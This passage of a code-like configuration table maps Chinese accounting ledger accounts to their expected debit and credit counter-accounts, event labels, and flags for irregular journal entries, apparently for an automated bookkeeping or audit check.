{\"opposite\":\"all\",\"event\":\"其他业务收入在借方\",\"problem\":\"其他业务收入在借方\"},\n ],\n\n \"credit_only_one\":False,\n \"credit\":{\"keywords\":other_income_rent_desc,\"contain_event\":\"确认其他业务收入-租赁收入\",\"not_contain_event\":\"确认其他业务收入-非租赁收入\"}\n },\n{\"no\":4,\"subject\":\"应收账款\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"应收账款增加-非收入确认\",\"problem\":\"应收账款增加-非收入确认\"},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"应收账款减少-收回货币资金\",\"problem\":None},\n {\"opposite\":monetary_funds_and_financial_fee,\"event\":\"应收账款减少-带折扣收回货币资金\",\"problem\":None},\n {\"opposite\":inventory_tax,\"event\":\"应收账款减少-交换存货\",\"problem\":None},\n {\"opposite\":long_term_assets_tax,\"event\":\"应收账款减少-交换长期资产\",\"problem\":None},\n {\"opposite\":expense_tax,\"event\":\"应收账款减少-转为费用\",\"problem\":None},\n {\"opposite\":payments,\"event\":\"应收账款减少-冲减应付款\",\"problem\":None},\n {\"opposite\":[\"应收票据\"],\"event\":\"应收账款减少-转为应收票据\",\"problem\":None},\n {\"opposite\":receivables,\"event\":\"应收账款减少-转为其他应收款项\",\"problem\":None},\n ]},\n{\"no\":5,\"subject\":\"应收票据\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"应收票据增加-非应收账款转入\",\"problem\":\"应收票据增加-非应收账款转入\"},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"应收票据减少-收回货币资金\",\"problem\":None},\n {\"opposite\":monetary_funds_and_financial_fee,\"event\":\"应收票据减少-贴现\",\"problem\":None},\n {\"opposite\":payments,\"event\":\"应收票据减少-冲减应付款\",\"problem\":None},\n ]},\n{\"no\":6,\"subject\":\"预收款项\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"预收款项减少-非收入确认\",\"problem\":\"预收款项减少-非收入确认\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"预收款项增加-收到货币资金\",\"problem\":None},\n ]},\n{\"no\":7,\"subject\":\"主营业务成本\",\"debit_only_one\":True,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"结转主营业务成本\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"主营业务成本在贷方\",\"problem\":\"主营业务成本在贷方\"},\n ]},\n{\"no\":8,\"subject\":\"其他业务成本\",\"debit_only_one\":True,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"结转其他业务成本\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"其他业务成本在贷方\",\"problem\":\"其他业务成本在贷方\"},\n ]},\n{\"no\":8,\"subject\":\"预计负债\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":monetary_funds,\"event\":\"偿还预计负债\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"固定资产\"],\"event\":\"预计负债-固定资产弃置义务\",\"problem\":None},\n {\"opposite\":[\"油气资产\"],\"event\":\"预计负债-油气资产弃置义务\",\"problem\":None},\n {\"opposite\":[\"财务费用\"],\"event\":\"预计负债-计提预计负债利息\",\"problem\":None},\n ]},\n{\"no\":39,\"subject\":\"固定资产清理\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"支付固定资产清理款\", \"problem\": None},\n {\"opposite\": [\"其他应付款\"], \"event\": \"应付固定资产清理款\", \"problem\": None},\n {\"opposite\": [\"固定资产\"], \"event\": \"固定资产转入清理\", \"problem\": None},\n {\"opposite\": [\"营业外收入\"], \"event\": \"营业外收入-处置固定资产\", \"problem\": \"固定资产处置不在营业外收入核算,应归集为资产处置收益\"},\n {\"opposite\": [\"资产处置收益\"], \"event\": \"资产处置收益-固定资产处置\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"营业外支出\"],\"event\":\"营业外支出-固定资产毁损报废\",\"problem\":\"检查固定资产是否为毁损报废,无使用价值。如果不是毁损报废,应计入资产处置收益。\"},\n {\"opposite\":[\"其他应收款\"],\"event\":\"处置固定资产应收款\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"收到固定资产清理款\",\"problem\":None},\n ]},\n{\"no\":21,\"subject\":\"资产减值损失\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"计提资产减值损失\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减资产减值损失\",\"problem\":None},\n ]},\n{\"no\":21,\"subject\":\"长期股权投资减值准备\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":[\"长期股权投资\",\"应收股利\",\"投资收益\"],\"event\":\"处置长期股权投资\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"长期股权投资减值准备增加\",\"problem\":\"长期股权投资减值准备增加\"},\n ]},\n{\"no\":21,\"subject\":\"固定资产减值准备\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"固定资产减值准备减少\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"固定资产减值准备增加\",\"problem\":\"固定资产减值准备增加\"},\n ]},\n{\"no\":21,\"subject\":\"无形资产减值准备\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":[\"无形资产\"],\"event\":\"处置无形资产\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"无形资产减值准备增加\",\"problem\":\"无形资产减值准备增加\"},\n ]},\n{\"no\":8,\"subject\":\"长期股权投资\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":[\"银行存款\"],\"event\":\"股权投资-货币资金\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"营业外收入\"],\"event\":\"股权投资-货币资金,权益法下初始投资成本小于应享有的被投资单位可辨认净资产公允价值份额部分\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"资本公积\"],\"event\":\"股权投资-货币资金,同一控制下合并取得的股权投资\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"固定资产\",\"无形资产\",\"营业外收入\",\"资本公积\",\"其他应收款\",\"其他应付款\"],\"event\":\"股权投资-包含其他资产或负债\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"交易性金融资产\",\"其他权益工具投资\",\"可供出售金融资产\"],\"event\":\"股权投资-金融资产转为股权投资\",\"problem\":None},\n {\"opposite\":[\"股本\",\"资本公积\"],\"event\":\"股权投资-发行权益性债券\",\"problem\":None},\n {\"opposite\":[\"投资收益\"],\"event\":\"股权投资-权益法下确认投资收益\",\"problem\":None},\n {\"opposite\":[\"其他综合收益\",\"资本公积-其他资本公积\"],\"event\":\"股权投资-其他权益变动\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"应收股利\"],\"event\":\"确认联营企业或合营企业股利\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"处置长期股权投资\",\"problem\":None},\n ],\n \"two_way\":[\n {\"keywords\": [\"增资\",\"权益法转为成本法\",\"增加投资\"],\"contain_event\":\"权益法转为成本法核算\",\"problem\": None},\n {\"keywords\": [\"减资\",\"成本法转为权益法\",\"处置投资\"],\"contain_event\":\"成本法转为权益法核算\",\"problem\": None},\n ]\n },\n\n{\"no\":40,\"subject\":\"固定资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"在建工程\"], \"event\": \"在建工程转入固定资产\", \"problem\": None},\n {\"opposite\": [\"库存现金\",\"银行存款\",\"应付账款\",\"预付款项\",\"其他应付款\",\"其他应收款\",\"长期应付款\"], \"event\": \"购入固定资产\", \"problem\": None},\n {\"opposite\": [\"股本\",\"资本公积\"], \"event\": \"股东投入的固定资产\", \"problem\": None},\n {\"opposite\": [\"累计折旧\", \"投资性房地产\"], \"event\": \"投资性房地产转入固定资产-成本核算\", \"problem\": None},\n {\"opposite\": [\"公允价值变动损益\", \"投资性房地产\"], \"event\": \"投资性房地产转入固定资产-公允价值核算\", \"problem\": None},\n {\"opposite\": \"all\", \"event\": \"固定资产增加\", \"problem\": \"固定资产增加\"},\n\n],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": [\"库存现金\",\"银行存款\",\"应付账款\",\"预付款项\",\"其他应付款\",\"其他应收款\",\"长期应付款\"], \"event\": \"退回固定资产\", \"problem\": None},\n {\"opposite\": [\"应交税费\"], \"event\": \"固定资产进项税冲减固定资产原值\", \"problem\":None},\n {\"opposite\":[\"累计折旧\",\"投资性房地产\"],\"event\":\"固定资产转入投资性房地产\",\"problem\":None},\n {\"opposite\":[\"累计折旧\",\"固定资产清理\"],\"event\":\"固定资产转入清理\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"处置固定资产收到货币资金\",\"problem\":\"固定资产处置建议通过固定资产清理科目核算\"},\n {\"opposite\":\"all\",\"event\":\"固定资产减少\",\"problem\":\"固定资产减少\"},\n\n ]},\n{\"no\": 40, \"subject\": \"租赁负债\", \"debit_only_one\": False,\n \"debit\": [\n {\"opposite\": monetary_funds, \"event\": \"支付租赁负债\", \"problem\": None},\n\n ],\n \"credit_only_one\": False,\n \"credit\": [\n {\"opposite\": [\"使用权资产\"], \"event\": \"租赁增加使用权资产\", \"problem\": None},\n\n ]},\n{\"no\":40,\"subject\":\"使用权资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"库存现金\",\"银行存款\",\"租赁负债\"], \"event\": \"租赁增加使用权资产\", \"problem\": None},\n\n],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"使用权资产减少\",\"problem\":\"使用权资产减少\"},\n\n ]},\n{\"no\":40,\"subject\":\"无形资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"开发支出\"], \"event\": \"开发支出转入无形资产\", \"problem\": None},\n {\"opposite\": [\"库存现金\",\"银行存款\",\"应付账款\",\"其他应付款\",\"其他应收款\",\"长期应付款\"], \"event\": \"购入无形资产\", \"problem\": None},\n {\"opposite\": [\"股本\",\"资本公积\"], \"event\": \"股东投入的无形资产\", \"problem\": None},\n {\"opposite\": [\"累计摊销\", \"投资性房地产\"], \"event\": \"投资性房地产转入无形资产-成本核算\", \"problem\": None},\n {\"opposite\": [\"公允价值变动损益\", \"投资性房地产\"], \"event\": \"投资性房地产转入无形资产-公允价值核算\", \"problem\": None},\n\n],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"累计摊销\",\"投资性房地产\"],\"event\":\"无形资产转入投资性房地产\",\"problem\":None},\n {\"opposite\": [\"银行存款\", \"累计摊销\", \"无形资产减值准备\", \"其他应收款\"], \"event\": \"处置无形资产\", \"problem\": None},\n {\"opposite\": [\"管理费用\"], \"event\": \"无形资产摊销未经过累计摊销直接计入管理费用\", \"problem\": \"无形资产摊销未经过累计摊销直接计入管理费用\"},\n ]},\n{\"no\":41,\"subject\":\"投资性房地产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"公允价值变动损益\"], \"event\": \"投资性房地产公允价值变动\", \"problem\": None},\n {\"opposite\": [\"开发产品\",\"公允价值变动损益\",\"其他综合收益\"], \"event\": \"存货转换为投资性房地产\", \"problem\": None},\n {\"opposite\": [\"在建工程\"], \"event\": \"在建工程车转换为投资性房地产\", \"problem\": None},\n {\"opposite\": monetary_funds, \"event\": \"现金购买投资性房地产\", \"problem\": None},\n {\"opposite\": [\"应付账款\",\"其他应付款\",\"长期应付款\"], \"event\": \"欠款购买投资性房地产\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"开发产品\",\"投资性房地产累计折旧\",\"投资性房地产累计摊销\",\"公允价值变动损益\"],\"event\":\"投资性房地产转为存货\",\"problem\":None},\n {\"opposite\":[\"其他业务成本\",\"主营业务成本\"],\"event\":\"处置投资性房地产\",\"problem\":None},\n ]},\n{\"no\":11,\"subject\":\"开发支出\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"开发支出增加\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"管理费用\"],\"event\":\"开发支出转为管理费用\",\"problem\":\"开发支出-费用化支出应转入研发费用科目\"},\n ]},\n{\"no\":11,\"subject\":\"长期待摊费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"长期待摊费用增加\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"长期待摊费用摊销或减少\",\"problem\":None},\n ]},\n{\"no\":9,\"subject\":\"投资性房地产累计折旧\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"投资性房地产累计折旧减少\",\"problem\":\"投资性房地产累计折旧减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":operating_cost,\"event\":\"计提投资性房地产折旧\",\"problem\":None},\n ]},\n{\"no\":9,\"subject\":\"累计折旧\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"累计折旧减少\",\"problem\":\"累计折旧减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提折旧\",\"problem\":None},\n ]},\n{\"no\":9,\"subject\":\"使用权资产累计折旧\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"使用权资产累计折旧减少\",\"problem\":\"使用权资产累计折旧减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提使用权资产折旧\",\"problem\":None},\n ]},\n{\"no\":10,\"subject\":\"累计摊销\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"累计摊销减少\",\"problem\":\"累计摊销减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"无形资产摊销\",\"problem\":None},\n ]},\n\n{\"no\":12,\"subject\":\"其他收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"冲减其他收益\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"财务费用\"],\"event\":\"政府补助-其他收益-冲减借款费用\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"政府补助-其他收益-收到货币资金\",\"problem\":None},\n {\"opposite\":[\"递延收益\"],\"event\":\"政府补助-其他收益-递延收益摊销\",\"problem\":None},\n ]},\n{\"no\":13,\"subject\":\"营业外收入\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"冲减营业外收入\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":\n {\"keywords\": government_grants,\n \"contain_event\": [\n {\"opposite\":[\"财务费用\"],\"event\":\"政府补助-营业外收入-冲减借款费用\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"政府补助-营业外收入-收到货币资金\",\"problem\":None},\n {\"opposite\":[\"递延收益\"],\"event\":\"政府补助-营业外收入-递延收益摊销\",\"problem\":None},\n ],\n \"not_contain_event\": \"确认营业外收入-非政府补助项目\"}\n },\n{\"no\":14,\"subject\":\"递延收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"递延收益摊销\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"递延收益-收到政府补助-货币资金\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"递延收益-收到政府补助-非货币资金\",\"problem\":\"递延收益-收到政府补助-非货币资金\"},\n ]},\n{\"no\":18,\"subject\":\"财务费用\",\"debit_only_one\":False,\n\"debit\":\n [\n {\"keywords\": [\"融资费用\"],\"contain_event\":\"财务费用-未确认融资费用\",\"problem\": None},\n {\"keywords\": [\"融资收益\"],\"contain_event\":\"财务费用-未实现融资收益\",\"problem\": None},\n {\"keywords\": [\"租赁负债\"],\"contain_event\":\"财务费用-租赁负债利息\",\"problem\": None},\n {\"keywords\": [\"资金占用\"],\"contain_event\":\"财务费用-资金占用费\",\"problem\": \"资金占用费收入建议计入其他业务收入或投资收益\"},\n {\"keywords\": [\"利息收入\",\"收到利息\"],\"contain_event\":\"财务费用-利息收入\",\"problem\": None},\n {\"keywords\": [\"利息支出\",\"支付利息\"],\"contain_event\":\"财务费用-利息支出\",\"problem\": None},\n {\"keywords\": bank_charges_desc,\"contain_event\":\"财务费用-手续费\",\"problem\": None},\n {\"keywords\": exchange_desc,\"contain_event\":\"财务费用-汇兑损益\",\"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":\n [\n {\"keywords\": [\"融资费用\"],\"contain_event\":\"财务费用-冲减未确认融资费用\",\"problem\": None},\n {\"keywords\": [\"融资收益\"],\"contain_event\":\"财务费用-冲减未实现融资收益\",\"problem\": None},\n {\"keywords\": [\"租赁负债\"],\"contain_event\":\"财务费用-冲减租赁负债利息\",\"problem\": None},\n {\"keywords\": [\"资金占用\"],\"contain_event\":\"财务费用-冲减资金占用费\",\"problem\": \"资金占用费收入建议计入其他业务收入或投资收益\"},\n {\"keywords\": [\"利息收入\",\"收到利息\"],\"contain_event\":\"财务费用-冲减利息收入\",\"problem\": None},\n {\"keywords\": [\"利息支出\",\"支付利息\"],\"contain_event\":\"财务费用-冲减利息支出\",\"problem\": None},\n {\"keywords\": bank_charges_desc,\"contain_event\":\"财务费用-冲减手续费\",\"problem\": None},\n {\"keywords\": exchange_desc,\"contain_event\":\"财务费用-冲减汇兑损益\",\"problem\": None}\n ],\n },\n{\"no\":15,\"subject\":\"应付利息\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"支付应付利息\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认应付利息\",\"problem\":None},\n ]},\n\n\n{\"no\":17,\"subject\":\"应付债券\",\"debit_only_one\":False,\n\"debit\":\n {\"keywords\": bonds_payable_interest,\n \"contain_event\": [\n {\"opposite\":monetary_funds,\"event\":\"归还应付债券本金和利息\",\"problem\":None},\n ],\n \"not_contain_event\": \"偿还应付债券\",\n },\n \"credit_only_one\":False,\n \"credit\":\n {\"keywords\": bonds_payable_interest,\n \"contain_event\": [\n {\"opposite\":interest_collection_subjects,\"event\":\"计提债券利息\",\"problem\":None},\n ],\n \"not_contain_event\": [\n {\"opposite\":monetary_funds,\"event\":\"发行债券收到现金\",\"problem\":None},\n ],\n }\n },\n{\"no\":15,\"subject\":\"其他权益工具\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"发行其他权益工具\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n\n {\"opposite\":monetary_funds,\"event\":\"现金赎回其他权益工具\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"库存股\"],\"event\":\"回购股票赎回其他权益工具\",\"problem\":None},\n {\"opposite\":[\"股本\",\"资本公积\",\"银行存款\",\"库存股\"],\"event\":\"其他权益工具转为股本\",\"problem\":None},\n {\"opposite\":[\"应付债券\"],\"event\":\"其他权益工具转为应付债券\",\"problem\":None},\n ]},\n{\"no\":15,\"subject\":\"库存股\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"回购公司股份\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"资本公积\"],\"event\":\"可能为以权益结算的股份支付\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"股本\",\"资本公积\",\"盈余公积\",\"利润分配\"],\"event\":\"注销库存股\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"资本公积\",\"盈余公积\",\"利润分配\"],\"event\":\"转让库存股\",\"problem\":None},\n ]},\n{\"no\":16,\"subject\":\"应收利息\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"确认应收利息\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收到利息收入\",\"problem\":None},\n ]},\n\n\n{\"no\":16,\"subject\":\"交易性金融资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融资产公允价值变动\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"购买交易性金融资产\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融资产公允价值变动\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"投资收益\",\"公允价值变动损益\"],\"event\":\"处置交易性金融资产\",\"problem\":None},\n ],\n },\n{\"no\":16,\"subject\":\"交易性金融负债\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融负债公允价值变动\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"投资收益\",\"公允价值变动损益\"],\"event\":\"处置交易性金融负债\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[*monetary_funds,\"投资收益\"],\"event\":\"确认交易性金融负债\",\"problem\":None},\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融负债公允价值变动\",\"problem\":None},\n ],\n },\n{\"no\":16,\"subject\":\"以公允价值计量且其变动计入当期损益的金融资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"公允价值变动损益\"], \"event\": \"确认以公允价值计量且其变动计入当期损益的金融资产公允价值变动\", \"problem\": \"新准则更名为交易性金融资产\"},\n {\"opposite\": monetary_funds, \"event\": \"购买以公允价值计量且其变动计入当期损益的金融资产\", \"problem\": \"新准则更名为交易性金融资产\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": [*monetary_funds, \"投资收益\"], \"event\": \"处置以公允价值计量且其变动计入当期损益的金融资产\", \"problem\": \"新准则更名为交易性金融资产\"},\n {\"opposite\": [\"公允价值变动损益\"], \"event\": \"确认以公允价值计量且其变动计入当期损益的金融资产公允价值变动\", \"problem\": \"新准则更名为交易性金融资产\"},\n ],\n },\n{\"no\":16,\"subject\":\"以公允价值计量且其变动计入当期损益的金融负债\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认以公允价值计量且其变动计入当期损益的金融负债公允价值变动\",\"problem\":\"新准则更名为交易性金融负债\"},\n {\"opposite\":[*monetary_funds,\"投资收益\",\"公允价值变动损益\"],\"event\":\"处置以公允价值计量且其变动计入当期损益的金融负债\",\"problem\":\"新准则更名为交易性金融负债\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[*monetary_funds,\"投资收益\"],\"event\":\"确认以公允价值计量且其变动计入当期损益的金融负债\",\"problem\":\"新准则更名为交易性金融负债\"},\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认以公允价值计量且其变动计入当期损益的金融负债公允价值变动\",\"problem\":\"新准则更名为交易性金融负债\"},\n ],\n },\n{\"no\":16,\"subject\":\"投资收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"投资收益在借方\",\"problem\":\"投资收益在借方\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认投资收益\",\"problem\":None},\n ]},\n{\"no\":16,\"subject\":\"公允价值变动损益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"公允价值变动损益在借方\",\"problem\":\"公允价值变动损益在借方\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认公允价值变动损益\",\"problem\":None},\n ]},\n{\"no\":16,\"subject\":\"持有至到期投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"购买持有至到期投资\",\"problem\":\"新金融准则分类为债权投资\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"持有至到期投资减少\",\"problem\":\"持有至到期投资减少\"},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买持有至到期投资\",\"problem\": \"新金融准则分类为债权投资\"},\n ]\n },\n{\"no\":16,\"subject\":\"债权投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"购买债权投资\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"债权投资减少\",\"problem\":\"债权投资减少\"},\n\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买债权投资\",\"problem\": None},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置债权投资\",\"problem\": None},\n ]\n },\n{\"no\":16,\"subject\":\"可供出售金融资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"购买可供出售金融资产\",\"problem\":\"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n {\"opposite\":[\"其他综合收益\"],\"event\":\"可供出售金融资产公允价值变动调整\",\"problem\":\"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"其他综合收益\"],\"event\":\"可供出售金融资产公允价值变动调整\",\"problem\":\"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买可供出售金融资产\",\"problem\": \"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置可供出售金融资产\",\"problem\": \"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n ]\n },\n{\"no\":16,\"subject\":\"其他债权投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"购买其他债权投资\",\"problem\":None},\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他债权投资公允价值变动调整\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他债权投资公允价值变动调整\",\"problem\":None},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买其他债权投资\",\"problem\": None},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置其他债权投资\",\"problem\": None},\n ]\n },\n{\"no\":16,\"subject\":\"其他权益工具投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"其他权益工具投资\",\"problem\":None},\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他权益工具投资公允价值变动调整\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他权益工具投资公允价值变动调整\",\"problem\":None},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买其他权益工具投资\",\"problem\": None},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置其他权益工具投资\",\"problem\": None},\n ]\n },\n{\"no\":16,\"subject\":\"其他综合收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"盈余公积\",\"利润分配\"],\"event\":\"其他综合收益转入留存收益\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"其他综合收益增加\",\"problem\":\"其他综合收益增加\"},\n ],\n },\n\n{\"no\":19,\"subject\":\"税金及附加\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应交税费\"],\"event\":\"计提税金及附加\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"支付税金及附加\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减税金及附加\",\"problem\":None},\n ]},\n{\"no\":20,\"subject\":\"应付职工薪酬\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"支付职工薪酬\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提职工薪酬\",\"problem\":None},\n ]},\n\n{\"no\":22,\"subject\":\"信用减值损失\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"计提信用减值损失\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减信用减值损失\",\"problem\":\"冲减信用减值损失\"},\n ]},\n{\"no\":23,\"subject\":\"所得税费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应交税费\"],\"event\":\"计提所得税\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"支付所得税\",\"problem\":None},\n 